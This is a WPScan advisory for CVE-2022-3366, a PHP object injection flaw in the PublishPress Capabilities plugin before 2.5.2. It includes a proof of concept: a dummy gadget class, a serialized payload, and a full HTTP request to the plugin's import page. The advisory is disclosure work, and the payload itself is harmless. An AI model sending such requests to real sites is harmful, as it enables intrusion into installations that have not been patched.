WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

PublishPress Capabilities < 2.5.2 - Admin+ PHP Objection Injection

Description

The plugin unserializes the content of imported files, which could lead to PHP object injection attacks by administrators, on multisite WordPress configurations. Successful exploitation in this case requires other plugins with a suitable gadget chain to be present on the site.

Proof of Concept

To simulate a gadget chain, put the following code in a plugin

class Evil {
  public function __wakeup() : void {
    die("Arbitrary deserialization");
  }
}

Create a file named settings.json with the following content and import if: O:4:"Evil":0:{};

POST /wp-admin/admin.php?page=pp-capabilities-backup HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/admin.php?page=pp-capabilities-backup
Content-Type: multipart/form-data; boundary=---------------------------293588204025713533762090348603
Content-Length: 1198
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

-----------------------------293588204025713533762090348603
Content-Disposition: form-data; name="_wpnonce"

9ca77a826e
-----------------------------293588204025713533762090348603
Content-Disposition: form-data; name="_wp_http_referer"

/wordpress/wp-admin/admin.php?page=pp-capabilities-backup
-----------------------------293588204025713533762090348603
Content-Disposition: form-data; name="pp_capabilities_export_section[]"

user_roles
-----------------------------293588204025713533762090348603
Content-Disposition: form-data; name="pp_capabilities_export_section[]"

capsman_editor_features_backup
-----------------------------293588204025713533762090348603
Content-Disposition: form-data; name="pp_capabilities_export_section[]"

capsman_admin_features_backup
-----------------------------293588204025713533762090348603
Content-Disposition: form-data; name="import_file"; filename="capabilities-export-2022-09-27_3-28-28_am.json"
Content-Type: application/json

O:4:"Evil":0:{};
-----------------------------293588204025713533762090348603
Content-Disposition: form-data; name="import_backup"

Import
-----------------------------293588204025713533762090348603--

Affects Plugins

capability-manager-enhanced
Fixed in version 2.5.2
capabilities-pro
Fixed in version 2.5.2

References

CVE
CVE-2022-3366

Classification

Type

OBJECT INJECTION

OWASP top 10
A8: Insecure Deserialization
CWE
CWE-502

Miscellaneous

Original Researcher

Nguyen Pham Viet Nam

Submitter

Nguyen Pham Viet Nam

Submitter website
https://github.com/zzz25251325zzz
Verified

Yes

WPVDB ID
72639924-e7a7-4f7d-bd50-015d05ffd4fb

Timeline

Publicly Published

2022-10-10 (about 3 months ago)

Added

2022-10-10 (about 3 months ago)

Last Updated

2022-10-10 (about 3 months ago)

Our Other Services

WPScan WordPress Security Plugin